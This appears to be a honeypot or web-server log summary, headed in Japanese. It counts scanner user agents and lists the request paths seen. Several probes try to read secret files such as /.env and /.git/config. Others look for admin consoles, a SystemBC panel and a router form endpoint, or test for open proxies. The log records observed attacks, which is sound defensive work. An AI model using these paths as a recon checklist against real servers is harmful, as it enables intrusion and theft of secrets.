26	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
6	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`curl/8.1.2`
1	`https[:]//gdnplus[.]com:Gather Analyze Provide.`
1	`python-requests/2.31.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_13.67.44.234_80`
2		`\x03`
1		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x02`
17		`\x16\x03\x01`
1	GET	`/.DS_Store`	HTTP/1.1
29	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/4vCp`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Pages/log/`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/aab9`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/axis2-admin/`	HTTP/1.1
1	GET	`/axis2/`	HTTP/1.1
1	GET	`/axis2/axis2-admin/`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/jquery-3.3.1.slim.min.js`	HTTP/1.1
1	GET	`/jquery-3.3.2.slim.min.js`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/qRb7`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
2	GET	`/server-status`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/stalker_portal/server/tools/auth_simple.php`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`http[:]//165[.]232[.]135[.]20/13.67.44.234`	HTTP/1.1
2	GET	`http[:]//httpbin[.]org/ip`	HTTP/1.1
1	POST	`/goform/set_LimitClient_cfg`	HTTP/1.1
1	PRI	`*`	HTTP/2.0
1	t3	`12.1.2`